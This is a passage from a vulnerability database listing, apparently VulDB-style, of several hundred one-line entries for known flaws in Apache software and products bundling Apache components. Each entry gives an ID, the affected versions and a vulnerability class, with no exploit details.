5304| [103691] Apache OpenMeetings 3.2.0 Parameter privilege escalation
5305| [103690] Apache OpenMeetings 1.0.0 sql injection
5306| [103689] Apache OpenMeetings 1.0.0 crossdomain.xml privilege escalation
5307| [103688] Apache OpenMeetings 1.0.0 weak encryption
5308| [103687] Apache OpenMeetings 1.0.0 cross site request forgery
5309| [103556] Apache Roller 5.1.0/5.1.1 Weblog Page Template VTL privilege escalation
5310| [103554] Apache OpenMeetings 1.0.0 Password Update unknown vulnerability
5311| [103553] Apache OpenMeetings 1.0.0 File Upload privilege escalation
5312| [103552] Apache OpenMeetings 3.2.0 Chat cross site scripting
5313| [103551] Apache OpenMeetings 3.1.0 XML unknown vulnerability
5314| [103521] Apache HTTP Server 2.4.26 HTTP2 Free memory corruption
5315| [103520] Apache HTTP Server up to 2.2.33/2.4.26 mod_auth_digest Authorization Header memory corruption
5316| [103519] Apache Struts up to 2.5.11/2.3.32 Spring AOP denial of service
5317| [103518] Apache Struts up to 2.5.11 URLValidator directory traversal
5318| [103492] Apache Spark up to 2.1.x Web UI Reflected cross site scripting
5319| [103401] Apache Struts 2.3.x Struts 1 Plugin ActionMessage privilege escalation
5320| [103399] Apache Traffic Control Traffic Router TCP Connection Slowloris denial of service
5321| [103387] Apache Impala up to 2.8.0 StatestoreSubscriber weak encryption
5322| [103386] Apache Impala up to 2.7.x/2.8.0 Kerberos weak authentication
5323| [103352] Apache Solr Node weak authentication
5324| [102897] Apache Ignite up to 2.0 Update Notifier information disclosure
5325| [102878] Code42 CrashPlan 5.4.x RMI Server org.apache.commons.ssl.rmi.DateRMI privilege escalation
5326| [102698] Apache HTTP Server up to 2.2.32/2.4.25 mod_mime Content-Type memory corruption
5327| [102697] Apache HTTP Server 2.2.24/2.2.32 HTTP Strict Parsing ap_find_token Request Header memory corruption
5328| [102690] Apache HTTP Server up to 2.2.32/2.4.25 mod_ssl ap_hook_process_connection() denial of service
5329| [102689] Apache HTTP Server up to 2.2.32/2.4.25 ap_get_basic_auth_pw weak authentication
5330| [102622] Apache Thrift up to 0.9.2 Client Libraries skip denial of service
5331| [102538] Apache Ranger up to 0.7.0 Authorizer unknown vulnerability
5332| [102537] Apache Ranger up to 0.7.0 Wildcard Character unknown vulnerability
5333| [102536] Apache Ranger up to 0.6 Stored cross site scripting
5334| [102535] Apache Ranger up to 0.6.2 Policy Engine unknown vulnerability
5335| [102255] Apache NiFi up to 0.7.3/1.2.x Response Header privilege escalation
5336| [102254] Apache NiFi up to 0.7.3/1.2.x UI cross site scripting
5337| [102070] Apache CXF Fediz up to 1.1.2/1.2.0 Application Plugin denial of service
5338| [102020] Apache Tomcat up to 9.0.0.M1 Java Servlet HTTP Method unknown vulnerability
5339| [101858] Apache Hive up to 1.2.1/2.0.0 Client weak authentication
5340| [101802] Apache KNOX up to 0.11.0 WebHDFS privilege escalation
5341| [101928] HPE Aruba ClearPass Apache Tomcat information disclosure
5342| [101524] Apache Archiva up to 1.x/2.2.1 REST Endpoint cross site request forgery
5343| [101513] Apache jUDDI 3.1./3.1.2/3.1.3/3.1.4 Logout Open Redirect
5344| [101430] Apache CXF Fediz up to 1.3.1 OIDC Service cross site request forgery
5345| [101429] Apache CXF Fediz up to 1.2.3/1.3.1 Plugins cross site request forgery
5346| [100619] Apache Hadoop up to 2.6.x HDFS Servlet unknown vulnerability
5347| [100618] Apache Hadoop up to 2.7.0 HDFS Web UI cross site scripting
5348| [100621] Adobe ColdFusion 10/11/2016 Apache BlazeDS Library Deserialization privilege escalation
5349| [100205] Oracle MySQL Enterprise Monitor up to 3.1.6.8003/3.2.1182/3.3.2.1162 Apache Commons FileUpload denial of service
5350| [100191] Oracle Secure Global Desktop 4.71/5.2/5.3 Web Server (Apache HTTP Server) information disclosure
5351| [100162] Oracle StorageTek Tape Analytics SW Tool up to 2.2.0 Apache Commons Collections privilege escalation
5352| [100160] Oracle StorageTek Tape Analytics SW Tool up to 2.2.0 Apache Trinidad unknown vulnerability
5353| [99969] Oracle WebCenter Sites 11.1.1.8.0 Apache Tomcat memory corruption
5354| [99937] Apache Batik up to 1.8 privilege escalation
5355| [99936] Apache FOP up to 2.1 privilege escalation
5356| [99935] Apache CXF up to 3.0.12/3.1.10 STSClient Cache information disclosure
5357| [99934] Apache CXF up to 3.0.12/3.1.10 JAX-RS XML Security Streaming Client spoofing
5358| [99930] Apache Traffic Server up to 6.2.0 denial of service
5359| [99929] Apache Log4j up to 2.8.1 Socket Server Deserialization privilege escalation
5360| [99925] Apache Traffic Server 6.0.0/6.1.0/6.2.0 HPACK Bomb denial of service
5361| [99738] Ping Identity OpenID Connect Authentication Module up to 2.13 on Apache Mod_auth_openidc.c spoofing
5362| [117569] Apache Hadoop up to 2.7.3 privilege escalation
5363| [99591] Apache TomEE up to 1.7.3/7.0.0-M2 EjbObjectInputStream Serialized Object privilege escalation
5364| [99370] Apache Ignite up to 1.8 update-notifier Document XML External Entity
5365| [99299] Apache Geode up to 1.1.0 Pulse OQL Query privilege escalation
5366| [99572] Apache Tomcat up to 7.0.75/8.0.41/8.5.11/9.0.0.M17 Application Listener privilege escalation
5367| [99570] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 HTTP Connector Cache information disclosure
5368| [99569] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 HTTP/2 GOAWAY Frame Resource Exhaustion denial of service
5369| [99568] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 Pipelined Request information disclosure
5370| [99048] Apache Ambari up to 2.3.x REST API Shell Metacharacter privilege escalation
5371| [99014] Apache Camel Jackson/JacksonXML privilege escalation
5372| [98610] Apple macOS up to 10.12.3 apache_mod_php memory corruption
5373| [98609] Apple macOS up to 10.12.3 apache_mod_php denial of service
5374| [98608] Apple macOS up to 10.12.3 apache_mod_php memory corruption
5375| [98607] Apple macOS up to 10.12.3 apache_mod_php denial of service
5376| [98606] Apple macOS up to 10.12.3 apache_mod_php denial of service
5377| [98605] Apple macOS up to 10.12.3 Apache denial of service
5378| [98604] Apple macOS up to 10.12.3 Apache denial of service
5379| [98603] Apple macOS up to 10.12.3 Apache denial of service
5380| [98602] Apple macOS up to 10.12.3 Apache denial of service
5381| [98601] Apple macOS up to 10.12.3 Apache denial of service
5382| [98517] Apache POI up to 3.14 OOXML File XXE denial of service
5383| [98405] Apache Hadoop up to 0.23.10 privilege escalation
5384| [98199] Apache Camel Validation XML External Entity
5385| [97892] Apache Tomcat up to 9.0.0.M15 Reverse-Proxy Http11InputBuffer.java information disclosure
5386| [97617] Apache Camel camel-snakeyaml Deserialization privilege escalation
5387| [97602] Apache Camel camel-jackson/camel-jacksonxml CamelJacksonUnmarshalType privilege escalation
5388| [97732] Apache Struts up to 2.3.31/2.5.10 Jakarta Multipart Parser Content-Type privilege escalation
5389| [97466] mod_auth_openidc up to 2.1.5 on Apache weak authentication
5390| [97455] mod_auth_openidc up to 2.1.4 on Apache weak authentication
5391| [97081] Apache Tomcat HTTPS Request denial of service
5392| [97162] EMC OpenText Documentum D2 BeanShell/Apache Commons privilege escalation
5393| [96949] Hanwha Techwin Smart Security Manager up to 1.5 Redis/Apache Felix Gogo privilege escalation
5394| [96314] Apache Cordova up to 6.1.1 on Android weak authentication
5395| [95945] Apple macOS up to 10.12.2 apache_mod_php denial of service
5396| [95944] Apple macOS up to 10.12.2 apache_mod_php denial of service
5397| [95943] Apple macOS up to 10.12.2 apache_mod_php memory corruption
5398| [95666] Oracle FLEXCUBE Direct Banking 12.0.0/12.0.1/12.0.2/12.0.3 Apache Commons Collections privilege escalation
5399| [95455] Apache NiFi up to 1.0.0/1.1.0 Connection Details Dialogue cross site scripting
5400| [95311] Apache Storm UI Daemon privilege escalation
5401| [95291] ZoneMinder 1.30.0 Apache httpd privilege escalation
5402| [94800] Apache Wicket up to 1.5.16/6.24.x Deserialize DiskFileItem denial of service
5403| [94705] Apache Qpid Broker for Java up to 6.1.0 SCRAM-SHA-1/SCRAM-SHA-256 User information disclosure
5404| [94627] Apache HTTP Server up to 2.4.24 mod_auth_digest Crash denial of service
5405| [94626] Apache HTTP Server up to 2.4.24 mod_session_crypto Padding weak encryption
5406| [94625] Apache HTTP Server up to 2.4.24 Response Split privilege escalation
5407| [94540] Apache Tika 1.9 tika-server File information disclosure
5408| [94600] Apache ActiveMQ up to 5.14.1 Administration Console cross site scripting
5409| [94348] Apple macOS up to 10.12.1 apache_mod_php denial of service
5410| [94347] Apple macOS up to 10.12.1 apache_mod_php denial of service
5411| [94346] Apple macOS up to 10.12.1 apache_mod_php denial of service
5412| [94345] Apple macOS up to 10.12.1 apache_mod_php denial of service
5413| [94344] Apple macOS up to 10.12.1 apache_mod_php denial of service
5414| [94343] Apple macOS up to 10.12.1 apache_mod_php memory corruption
5415| [94342] Apple macOS up to 10.12.1 apache_mod_php memory corruption
5416| [94128] Apache Tomcat up to 9.0.0.M13 Error information disclosure
5417| [93958] Apache HTTP Server up to 2.4.23 mod_http2 h2_stream.c denial of service
5418| [93874] Apache Subversion up to 1.8.16/1.9.4 mod_dontdothat XXE denial of service
5419| [93855] Apache Hadoop up to 2.6.4/2.7.2 HDFS Service privilege escalation
5420| [93609] Apache OpenMeetings 3.1.0 RMI Registry privilege escalation
5421| [93555] Apache Tika 1.6-1.13 jmatio MATLAB File privilege escalation
5422| [93799] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 JmxRemoteLifecycleListener privilege escalation
5423| [93798] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 JmxRemoteLifecycleListener privilege escalation
5424| [93797] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 HTTP Split privilege escalation
5425| [93796] Apache Tomcat up to 8.5.6/9.0.0.M11 HTTP/2 Header Parser denial of service
5426| [93532] Apache Commons Collections Library Java privilege escalation
5427| [93210] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 ResourceLinkFactory privilege escalation
5428| [93209] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Realm Authentication User information disclosure
5429| [93208] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 System Property Replacement information disclosure
5430| [93207] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Utility Method privilege escalation
5431| [93206] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Configuration privilege escalation
5432| [93098] Apache Commons FileUpload privilege escalation
5433| [92987] Oracle Virtual Desktop Infrastructure up to 3.5.2 Apache Commons Collection memory corruption
5434| [92986] Oracle Virtual Desktop Infrastructure up to 3.5.2 Apache Tomcat memory corruption
5435| [92982] Oracle Insurance IStream 4.3.2 Apache Commons Collections memory corruption
5436| [92981] Oracle Financial Services Lending and Leasing 14.1.0/14.2.0 Apache Commons Collections memory corruption
5437| [92979] Oracle up to 8.0.3 Apache Commons Collections memory corruption
5438| [92977] Oracle FLEXCUBE Universal Banking up to 12.2.0 Apache Commons Collections memory corruption
5439| [92976] Oracle FLEXCUBE Universal Banking 12.87.1/12.87.2 Apache Commons Collections memory corruption
5440| [92975] Oracle FLEXCUBE Private Banking up to 12.1.0 Apache Commons Collections memory corruption
5441| [92974] Oracle FLEXCUBE Investor Servicing 12.0.1 Apache Commons Collections memory corruption
5442| [92973] Oracle 12.0.0/12.1.0 Apache Commons Collections memory corruption
5443| [92972] Oracle FLEXCUBE Core Banking 11.5.0.0.0/11.6.0.0.0 Apache Commons Collections memory corruption
5444| [92962] Oracle Agile PLM 9.3.4/9.3.5 Apache Commons Collections memory corruption
5445| [92909] Oracle Agile PLM 9.3.4/9.3.5 Apache Tomcat unknown vulnerability
5446| [92786] Oracle Banking Digital Experience 15.1 Apache Commons Collections information disclosure
5447| [92549] Apache Tomcat on Red Hat privilege escalation
5448| [92509] Apache Tomcat JK ISAPI Connector up to 1.2.41 jk_uri_worker_map.c memory corruption
5449| [92314] Apache MyFaces Trinidad up to 1.0.13/1.2.15/2.0.1/2.1.1 CoreResponseStateManager memory corruption
5450| [92313] Apache Struts2 up to 2.3.28/2.5.0 Action Name Cleanup cross site request forgery
5451| [92299] Apache Derby up to 10.12.1.0 SqlXmlUtil XML External Entity
5452| [92217] Apache ActiveMQ Artemis up to 1.3.x Broker/REST GetObject privilege escalation
5453| [92174] Apache Ranger up to 0.6.0 Policy cross site scripting
5454| [91831] Apache Jackrabbit up to 2.13.2 HTTP Header cross site request forgery
5455| [91825] Apache Zookeeper up to 3.4.8/3.5.2 C CLI Shell memory corruption
5456| [91818] Apache CXF Fediz up to 1.2.2/1.3.0 Application Plugin privilege escalation
5457| [92056] Apple macOS up to 10.11 apache_mod_php memory corruption
5458| [92055] Apple macOS up to 10.11 apache_mod_php memory corruption
5459| [92054] Apple macOS up to 10.11 apache_mod_php denial of service
5460| [92053] Apple macOS up to 10.11 apache_mod_php denial of service
5461| [92052] Apple macOS up to 10.11 apache_mod_php denial of service
5462| [92051] Apple macOS up to 10.11 apache_mod_php memory corruption
5463| [92050] Apple macOS up to 10.11 apache_mod_php denial of service
5464| [92049] Apple macOS up to 10.11 apache_mod_php memory corruption
5465| [92048] Apple macOS up to 10.11 apache_mod_php denial of service
5466| [92047] Apple macOS up to 10.11 apache_mod_php memory corruption
5467| [92046] Apple macOS up to 10.11 apache_mod_php memory corruption
5468| [92045] Apple macOS up to 10.11 apache_mod_php memory corruption
5469| [92044] Apple macOS up to 10.11 apache_mod_php memory corruption
5470| [92043] Apple macOS up to 10.11 apache_mod_php denial of service
5471| [92042] Apple macOS up to 10.11 apache_mod_php memory corruption
5472| [92041] Apple macOS up to 10.11 apache_mod_php memory corruption
5473| [92040] Apple macOS up to 10.11 Apache Proxy privilege escalation
5474| [91785] Apache Shiro up to 1.3.1 Servlet Filter privilege escalation
5475| [90879] Apache OpenMeetings up to 3.1.1 SWF Panel cross site scripting
5476| [90878] Apache Sentry up to 1.6.x Blacklist Filter reflect/reflect2/java_method privilege escalation
5477| [90610] Apache POI up to 3.13 XLSX2CSV Example OpenXML Document XML External Entity
5478| [90584] Apache ActiveMQ up to 5.11.3/5.12.2/5.13/1 Administration Web Console privilege escalation
5479| [90385] Apache Archiva up to 1.3.9 addProxyConnector_commit.action cross site scripting
5480| [90384] Apache Archiva up to 1.3.9 addProxyConnector_commit.action cross site request forgery
5481| [90383] Apache OpenOffice up to 4.1.2 Impress File memory corruption
5482| [89670] Apache Tomcat up to 8.5.4 CGI Servlet Environment Variable Open Redirect
5483| [89669] Apache HTTP Server up to 2.4.23 RFC 3875 Namespace Conflict Environment Variable Open Redirect
5484| [89726] Apple Mac OS X up to 10.11.5 apache_mod_php memory corruption
5485| [89484] Apache Qpid up to 0.13.0 on Windows Proton Library Certificate weak authentication
5486| [89473] HPE iMC PLAT/EAD/APM/iMC NTA/iMC BIMS/iMC UAM_TAM up to 7.2 Apache Commons Collections Library Command privilege escalation
5487| [90263] Apache Archiva Header denial of service
5488| [90262] Apache Archiva Deserialize privilege escalation
5489| [90261] Apache Archiva XML DTD Connection privilege escalation
5490| [88827] Apache Xerces-C++ up to 3.1.3 DTD Stack-Based memory corruption
5491| [88747] Apache HTTP Server 2.4.17/2.4.18 mod_http2 denial of service
5492| [88608] Apache Struts up to 2.3.28.1/2.5.0 URLValidator Null Value denial of service
5493| [88607] Apache Struts up to 2.3.28.1 REST Plugin Expression privilege escalation
5494| [88606] Apache Struts up to 2.3.28.1 Restriction privilege escalation
5495| [88605] Apache Struts up to 2.3.28.1 Restriction privilege escalation
5496| [88604] Apache Struts up to 2.3.28.1 Token Validator cross site request forgery
5497| [88603] Apache Commons FileUpload up to 1.3.1 MultipartStream denial of service
5498| [88602] Apache Struts up to 1.3.10 ActionServlet.java cross site scripting
5499| [88601] Apache Struts up to 1.3.10 Multithreading ActionServlet.java memory corruption
5500| [88600] Apache Struts up to 1.3.10 MultiPageValidator privilege escalation
5501| [89005] Apache Qpid AMQP JMS Client getObject privilege escalation
5502| [87888] Apache Ranger up to 0.5.2 Policy Admin Tool eventTime sql injection
5503| [87835] Apache CloudStack up to 4.5.2.0/4.6.2.0/4.7.1.0/4.8.0.0 SAML-based Authentication privilege escalation
5504| [87806] HPE Discovery and Dependency Mapping Inventory up to 9.32 update 3 Apache Commons Collections Library privilege escalation
5505| [87805] HPE Universal CMDB up to 10.21 Apache Commons Collections Library privilege escalation
5506| [87768] Apache Shiro up to 1.2.4 Cipher Key privilege escalation
5507| [87765] Apache James Server 2.3.2 Command privilege escalation
5508| [88667] Apache HTTP Server up to 2.4.20 mod_http2 Certificate weak authentication
5509| [87718] Apache Struts up to 2.3.24.1 OGNL Caching denial of service
5510| [87717] Apache Struts up to 2.3.28 REST Plugin privilege escalation
5511| [87706] Apache Qpid Java up to 6.0.2 AMQP privilege escalation
5512| [87703] Apache Qbid Java up to 6.0.2 PlainSaslServer.java denial of service
5513| [87702] Apache ActiveMQ up to 5.13.x Fileserver Web Application Upload privilege escalation
5514| [87700] Apache PDFbox up to 1.8.11/2.0.0 XML Parser PDF Document XML External Entity
5515| [87679] HP Release Control 9.13/9.20/9.21 Apache Commons Collections Library Java Object privilege escalation
5516| [87540] Apache Ambari up to 2.2.0 File Browser View information disclosure
5517| [87433] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
5518| [87432] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
5519| [87431] Apple Mac OS X up to 10.11.4 apache_mod_php Format String
5520| [87430] Apple Mac OS X up to 10.11.4 apache_mod_php denial of service
5521| [87429] Apple Mac OS X up to 10.11.4 apache_mod_php information disclosure
5522| [87428] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
5523| [87427] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
5524| [87389] Apache Xerces C++ up to 3.1.3 XML Document DTDScanner.cpp memory corruption
5525| [87172] Adobe ColdFusion 11 Update 7/2016/up to 10 Update 18 Apache Commons Collections Library privilege escalation
5526| [87121] Apache Cordova iOS up to 3.x Plugin privilege escalation
5527| [87120] Apache Cordova iOS up to 3.x URL Whitelist privilege escalation
5528| [83806] HPE Network Node Manager i up to 10.01 Apache Commons Collections Library privilege escalation
5529| [83077] Apache Subversion up to 1.8.15/1.9.3 mod_authz_svn mod_authz_svn.c denial of service
5530| [83076] Apache Subversion up to 1.8.15/1.9.3 svnserve svnserve/cyrus_auth.c privilege escalation
5531| [82790] Apache Struts 2.0.0/2.3.24/2.3.28 Dynamic Method privilege escalation
5532| [82789] Apache Struts 2.0.0/2.3.24/2.3.28 XSLTResult privilege escalation
5533| [82725] HPE P9000 Command View up to 7.x/8.4.0 Apache Commons Collections Library privilege escalation
5534| [82444] Apache Camel up to 2.14.x/2.15.4/2.16.0 HTTP Request privilege escalation
5535| [82389] Apache Subversion up to 1.7.x/1.8.14/1.9.2 mod_dav_svn util.c memory corruption
5536| [82280] Apache Struts up to 1.7 JRE URLDecoder cross site scripting
5537| [82260] Apache OFBiz up to 12.04.05/13.07.02 Java Object privilege escalation
5538| [82259] Apache Qpid Proton up to 0.12.0 proton.reactor.Connector weak encryption
5539| [82250] Apache Ranger up to 0.5.0 Admin UI weak authentication
5540| [82214] Apache Wicket up to 1.5.14/6.21.x/7.1.x Input Element cross site scripting
5541| [82213] Apache Wicket up to 1.5.14/6.21.x/7.1.x ModalWindow Title getWindowOpenJavaScript cross site scripting
5542| [82212] Apache Ranger up to 0.5.0 Policy Admin Tool privilege escalation
5543| [82211] Apache OFBiz up to 12.04.06/13.07.02 ModelFormField.java DisplayEntityField.getDescription cross site scripting
5544| [82082] Apache JetSpeed up to 2.3.0 User Manager Service privilege escalation
5545| [82081] Apache OpenMeetings up to 3.1.0 SOAP API information disclosure
5546| [82080] Apache OpenMeetings up to 3.1.0 Event cross site scripting
5547| [82078] Apache OpenMeetings up to 3.1.0 Import/Export System Backup ZIP Archive directory traversal
5548| [82077] Apache OpenMeetings up to 3.1.0 Password Reset sendHashByUser privilege escalation
5549| [82076] Apache Ranger up to 0.5.1 privilege escalation
5550| [82075] Apache JetSpeed up to 2.3.0 Portal cross site scripting
5551| [82074] Apache JetSpeed up to 2.3.0 cross site scripting
5552| [82073] Apache JetSpeed up to 2.3.0 User Manager Service sql injection
5553| [82072] Apache JetSpeed up to 2.3.0 Portal Site Manager ZIP Archive directory traversal
5554| [82058] Apache LDAP Studio/Directory Studio up to 2.0.0-M9 CSV Export privilege escalation
5555| [82053] Apache Ranger up to 0.4.x Policy Admin Tool privilege escalation
5556| [82052] Apache Ranger up to 0.4.x Policy Admin Tool HTTP Request cross site scripting
5557| [81696] Apache ActiveMQ up to 5.13.1 HTTP Header privilege escalation
5558| [81695] Apache Xerces-C up to 3.1.2 internal/XMLReader.cpp memory corruption
5559| [81622] HPE Asset Manager 9.40/9.41/9.50 Apache Commons Collections Library Java Object privilege escalation
5560| [81406] HPE Service Manager up to 9.35 P3/9.41 P1 Apache Commons Collections Library Command privilege escalation
5561| [81405] HPE Operations Orchestration up to 10.50 Apache Commons Collections Library Command privilege escalation
5562| [81427] Apple Mac OS X up to 10.11.3 apache_mod_php PNG File memory corruption
5563| [81426] Apple Mac OS X up to 10.11.3 apache_mod_php PNG File memory corruption
5564| [81372] Apache Struts up to 2.3.24.1 I18NInterceptor cross site scripting
5565| [81371] Apache Struts up to 2.3.24.1 Double OGNL Evaluation privilege escalation
5566| [81370] Apache Struts up to 2.3.24.1 Java URLDecoder cross site scripting
5567| [81084] Apache Tomcat 6.0/7.0/8.0/9.0 ServletContext directory traversal
5568| [81083] Apache Tomcat 7.0/8.0/9.0 Index Page cross site request forgery
5569| [81082] Apache Tomcat 7.0/8.0/9.0 ResourceLinkFactory.setGlobalContext privilege escalation
5570| [81081] Apache Tomcat 6.0/7.0/8.0/9.0 Error information disclosure
5571| [81080] Apache Tomcat 6.0/7.0/8.0/9.0 Session Persistence privilege escalation
5572| [81079] Apache Tomcat 6.0/7.0/8.0/9.0 StatusManagerServlet information disclosure
5573| [81078] Apache Tomcat 7.0/8.0/9.0 Session privilege escalation
5574| [80970] Apache Solr up to 5.3.0 Admin UI plugins.js cross site scripting
5575| [80969] Apache Solr up to 5.2 Schema schema-browser.js cross site scripting
5576| [80968] Apache Solr up to 5.0 analysis.js cross site scripting
5577| [80940] HP Continuous Delivery Automation 1.30 Apache Commons Collections Library privilege escalation
5578| [80823] Apache CloudStack up to 4.5.1 KVM Virtual Machine Migration privilege escalation
5579| [80822] Apache CloudStack up to 4.5.1 API Call information disclosure
5580| [80778] Apache Camel up to 2.15.4/2.16.0 camel-xstream privilege escalation
5581| [80750] HPE Operations Manager 8.x/9.0 on Windows Apache Commons Collections Library privilege escalation
5582| [80724] Apache Hive up to 1.2.1 Authorization Framework privilege escalation
5583| [80577] Oracle Secure Global Desktop 4.63/4.71/5.2 Apache HTTP Server denial of service
5584| [80165] Intel McAfee ePolicy Orchestrator up to 4.6.9/5.0.3/5.3.1 Apache Commons Collections Library privilege escalation
5585| [80116] Apache Subversion up to 1.9.2 svn Protocol libsvn_ra_svn/marshal.c read_string memory corruption
5586| [80115] Apache ActiveMQ up to 5.12.x Broker Service privilege escalation
5587| [80036] IBM Cognos Business Intelligence Apache Commons Collections Library InvokerTransformer privilege escalation
5588| [79873] VMware vCenter Operations/vRealize Orchestrator Apache Commons Collections Library Serialized Java Object privilege escalation
5589| [79840] Apache Cordova File Transfer Plugin up to 1.2.x on Android unknown vulnerability
5590| [79839] Apache TomEE Serialized Java Stream EjbObjectInputStream privilege escalation
5591| [79791] Cisco Products Apache Commons Collections Library privilege escalation
5592| [79539] Apple Mac OS X up to 10.11.1 apache_mod_php memory corruption
5593| [79538] Apple Mac OS X up to 10.11.1 apache_mod_php memory corruption
5594| [79294] Apache Cordova-Android up to 3.6 BridgeSecret Random Generator weak encryption
5595| [79291] Apache Cordova-Android up to 4.0 Javascript Whitelist privilege escalation
5596| [79244] Apache CXF up to 2.7.17/3.0.7/3.1.2 SAML Web SSO Module SAML Response weak authentication
5597| [79243] Oracle WebLogic Server 10.3.6.0/12.1.2.0/12.1.3.0/12.2.1.0 WLS Security com.bea.core.apache.commons.collections.jar privilege escalation
5598| [78989] Apache Ambari up to 2.1.1 Open Redirect
5599| [78988] Apache Ambari up to 2.0.1/2.1.0 Password privilege escalation
5600| [78987] Apache Ambari up to 2.0.x cross site scripting
5601| [78986] Apache Ambari up to 2.0.x Proxy Endpoint api/v1/proxy privilege escalation
5602| [78780] Apple Mac OS X up to 10.11.0 apache_mod_php denial of service
5603| [78779] Apple Mac OS X up to 10.11.0 apache_mod_php denial of service
5604| [78778] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
5605| [78777] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
5606| [78776] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
5607| [78775] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
5608| [78774] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
5609| [78297] Apache Commons Components HttpClient up to 4.3.5 HTTPS Timeout denial of service
5610| [77406] Apache Flex BlazeDS AMF Message XML External Entity
5611| [77429] Apache ActiveMQ up to 5.10.0 LDAPLoginModule privilege escalation
5612| [77399] Apache ActiveMQ up to 5.10.0 LDAPLoginModule weak authentication
5613| [77375] Apache Tapestry up to 5.3.5 Client-Side Object Storage privilege escalation
5614| [77331] Apache ActiveMQ up to 5.11.1 on Windows Fileserver Upload/Download directory traversal
5615| [77299] Apache Solr Real-Time Module up to 7.x-1.1 Index Content information disclosure
5616| [77247] Apache ActiveMQ up to 5.10 TransportConnection.java processControlCommand denial of service
5617| [77083] Apache Groovy up to 2.4.3 MethodClosure.java MethodClosure memory corruption
5618| [76953] Apache Subversion 1.7.0/1.8.0/1.8.10 svn_repos_trace_node_locations information disclosure
5619| [76952] Apache Subversion 1.7.0/1.8.0/1.8.10 mod_authz_svn anonymous/authenticated information disclosure
5620| [76567] Apache Struts 2.3.20 unknown vulnerability
5621| [76733] Apache HTTP Server 2.4.7/2.4.8/2.4.9/2.4.10/2.4.12 ap_some_auth_required unknown vulnerability
5622| [76732] Apache HTTP Server 2.4.7/2.4.8/2.4.9/2.4.10/2.4.12 Request apr_brigade_flatten privilege escalation
5623| [76731] Apache HTTP Server 2.4.12 ErrorDocument 400 Crash denial of service
5624| [75690] Apache Camel up to 2.13.3/2.14.1 XPathBuilder.java XML External Entity
5625| [75689] Apache Camel up to 2.13.3/2.14.1 XML Converter Setup XmlConverter.java SAXSource privilege escalation
5626| [75668] Apache Sling API/Sling Servlets Post up to 2.2.1 HtmlResponse cross site scripting
5627| [75601] Apache Jackrabbit up to 2.10.0 WebDAV Request XML External Entity
5628| [75420] Apache Tomcat up to 6.0.43/7.0.58/8.0.16 Security Manager privilege escalation
5629| [75145] Apache OpenOffice up to 4.1.1 HWP Filter Crash denial of service
5630| [75032] Apache Tomcat Connectors up to 1.2.40 mod_jk privilege escalation
5631| [75135] PHP 5.4/5.5 HTTP Request sapi_apache2.c apache2handler privilege escalation
5632| [74793] Apache Tomcat File Upload denial of service
5633| [74708] Apple MacOS X up to 10.10.2 Apache denial of service
5634| [74707] Apple MacOS X up to 10.10.2 Apache denial of service
5635| [74706] Apple MacOS X up to 10.10.2 Apache memory corruption
5636| [74705] Apple MacOS X up to 10.10.2 Apache denial of service
5637| [74704] Apple MacOS X up to 10.10.2 Apache denial of service
5638| [74703] Apple MacOS X up to 10.10.2 Apache denial of service
5639| [74702] Apple MacOS X up to 10.10.2 Apache denial of service
5640| [74701] Apple MacOS X up to 10.10.2 Apache cross site request forgery
5641| [74700] Apple MacOS X up to 10.10.2 Apache unknown vulnerability
5642| [74661] Apache Flex up to 4.14.0 asdoc index.html cross site scripting
5643| [74609] Apache Cassandra up to 1.2.19/2.0.13/2.1.3 JMX/RMI Interface privilege escalation
5644| [74469] Apache Xerces-C up to 7.0 internal/XMLReader.cpp denial of service
5645| [74468] Apache Batik up to 1.6 denial of service
5646| [74414] Apache Mod-gnutls up to 0.5.1 Authentication spoofing
5647| [74371] Apache Standard Taglibs up to 1.2.0 memory corruption
5648| [74367] Apache HTTP Server up to 2.4.12 mod_lua lua_request.c wsupgrade denial of service
5649| [74174] Apache WSS4J up to 2.0.0 privilege escalation
5650| [74172] Apache ActiveMQ up to 5.5.0 Administration Console cross site scripting
5651| [69092] Apache Tomcat up to 6.0.42/7.0.54/8.0.8 HTTP Request Smuggling privilege escalation
5652| [73831] Apache Qpid up to 0.30 Access Restriction unknown vulnerability
5653| [73731] Apache XML Security unknown vulnerability
5654| [68660] Oracle BI Publisher 10.1.3.4.2/11.1.1.7 Apache Tomcat cross site scripting
5655| [73659] Apache CloudStack up to 4.3.0 Stack-Based unknown vulnerability
5656| [73593] Apache Traffic Server up to 5.1.0 denial of service
5657| [73511] Apache POI up to 3.10 Deadlock denial of service
5658| [73510] Apache Solr up to 4.3.0 cross site scripting
5659| [68447] Apache Subversion up to 1.7.18/1.8.10 mod_dav_svn Crash denial of service
5660| [68446] Apache Subversion up to 1.7.18/1.8.10 REPORT Request Crash denial of service
5661| [73173] Apache CloudStack Stack-Based unknown vulnerability
5662| [68357] Apache Struts up to 2.3.16.3 Random Number Generator cross site request forgery
5663| [73106] Apache Hadoop up to 2.4.0 Symlink privilege escalation
5664| [68575] Apache HTTP Server up to 2.4.10 LuaAuthzProvider mod_lua.c privilege escalation
5665| [72890] Apache Qpid 0.30 unknown vulnerability
5666| [72887] Apache Hive 0.13.0 File Permission privilege escalation
5667| [72878] Apache Cordova 3.5.0 cross site request forgery
